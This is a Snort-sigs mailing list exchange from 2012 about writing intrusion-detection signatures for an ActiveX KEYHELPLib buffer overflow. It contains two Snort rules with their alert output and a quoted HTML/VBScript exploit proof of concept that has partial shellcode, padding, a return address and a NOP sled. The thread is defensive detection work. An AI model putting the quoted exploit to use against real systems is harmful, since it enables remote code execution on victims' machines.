[Snort-sigs] Problem writing a sig to capture vbscript unescape sequence

Nathan Benson nathan at ...3679...
Fri May 18 17:16:11 EDT 2012


Hi Bob,

I was able to successfully detect the content you were looking for using
2.9.2.1, 2.9.2.2, and 2.9.2.3 all with the default snort.conf using the
rules below.

I hope this is of some help.

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ActiveX
KEYHELPLib overflow attempt"; flow:to_client,established; file_data;
content:"B7ECFD41-BE62-11D2-B9A8-00104B138C8C"; fast_pattern:only;
pcre:"/eip\s*=\s*unescape\x28(?P<q1>[\x22\x27]?)%?67%41%41%7e(?P=q1)\s*\x29/smi";
classtype:attempted-user; sid:1010000; rev:1;)

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ActiveX
KEYHELPLib overflow attempt"; flow:to_client,established; file_data;
content:"B7ECFD41-BE62-11D2-B9A8-00104B138C8C"; fast_pattern:only;
content:"eip = unescape(|22|%67%41%41%7e|22|)"; nocase;
classtype:attempted-user; sid:1010001; rev:1;)

Here they are again unfolded:

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( \
msg:"ActiveX KEYHELPLib overflow attempt"; \
flow:to_client,established; \
file_data; \
content:"B7ECFD41-BE62-11D2-B9A8-00104B138C8C"; fast_pattern:only; \
pcre:"/eip\s*=\s*unescape\x28(?P<q1>[\x22\x27]?)%?67%41%41%7e(?P=q1)\s*\x29/smi";
\
classtype:attempted-user; \
sid:1010000; rev:1; \
)
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( \
msg:"ActiveX KEYHELPLib overflow attempt"; \
flow:to_client,established; \
file_data; \
content:"B7ECFD41-BE62-11D2-B9A8-00104B138C8C"; fast_pattern:only; \
content:"eip = unescape(|22|%67%41%41%7e|22|)"; nocase; \
classtype:attempted-user; \
sid:1010001; rev:1; \
)

10/13-09:55:36.078000  [**] [1:1010001:1] ActiveX KEYHELPLib overflow
attempt [**] [Classification: Attempted User Privilege Gain] [Priority: 1]
{TCP} 204.15.227.178:80 -> 192.168.0.1:23031
***A**** Seq: 0x91B  Ack: 0xC33  Win: 0x16D0  TcpLen: 20
10/13-09:55:36.078000  [**] [1:1010000:1] ActiveX KEYHELPLib overflow
attempt [**] [Classification: Attempted User Privilege Gain] [Priority: 1]
{TCP} 204.15.227.178:80 -> 192.168.0.1:23031
***A**** Seq: 0x91B  Ack: 0xC33  Win: 0x16D0  TcpLen: 20
10/13-09:55:36.078000  [**] [1:1010001:1] ActiveX KEYHELPLib overflow
attempt [**] [Classification: Attempted User Privilege Gain] [Priority: 1]
{TCP} 204.15.227.178:80 -> 192.168.0.1:5414
***A**** Seq: 0xBC3  Ack: 0x8DB  Win: 0x16D0  TcpLen: 20
10/13-09:55:36.078000  [**] [1:1010000:1] ActiveX KEYHELPLib overflow
attempt [**] [Classification: Attempted User Privilege Gain] [Priority: 1]
{TCP} 204.15.227.178:80 -> 192.168.0.1:5414
***A**** Seq: 0xBC3  Ack: 0x8DB  Win: 0x16D0  TcpLen: 20

On Fri, May 18, 2012 at 1:52 PM, Bob Huber <roberthuberjr at ...144...> wrote:

> I'm trying to write a sig for this ActiveX overflow:
>
> <html>
> <body>
> <object classid='clsid:B7ECFD41-BE62-11D2-B9A8-00104B138C8C'
> id='KEYHELPLib' />
> </object>
> <script language='vbscript'>
> //executing calc
> scode =      unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49")
> & _
>              ...SNIP...
>              unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a")
> jnk = string(537,"A")
> eip = unescape("%67%41%41%7e") '0x7E414167      call esp user32.dll
> nop = string(16,unescape("%90"))
> mapID=1
> pstrChmFile= jnk + eip + nop + scode
> pstrFrame="aaaaaaaa"
> 'KEYHELPLib.JumpMappedID mapID,pstrChmFile,pstrFrame
> KEYHELPLib.JumpURL mapID,pstrChmFile,pstrFrame
> </script>
> </body>
> </html>
>
> The problem I'm having is trying to get a content match off of the line -
>    eip = unescape("%67%41%41%7e")
> I can't figure out how to match that content.  I'm running both 2.8.5 and
> 2.9.2.  I was assuming it would see the <script> tag and it would try to
> decode javascript, and maybe that was the problem.  I've tried file_data,
> I've tried pkt_data. I've turned off javascript normalization, I've turned
> off extended_response_inspection.  No luck.
>
> Any help appreciated.
>
> Bob
>
>
> ------------------------------------------------------------------------------
> Live Security Virtual Conference
> Exclusive live event will cover all the ways today's security and
> threat landscape has changed and how IT managers can respond. Discussions
> will include endpoint security, mobile security and the latest in malware
> threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
> _______________________________________________
> Snort-sigs mailing list
> Snort-sigs at lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/snort-sigs
> http://www.snort.org
>
>
> Please visit http://blog.snort.org for the latest news about Snort!
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.snort.org/pipermail/snort-sigs/attachments/20120518/1fabd2fb/attachment.html>


More information about the Snort-sigs mailing list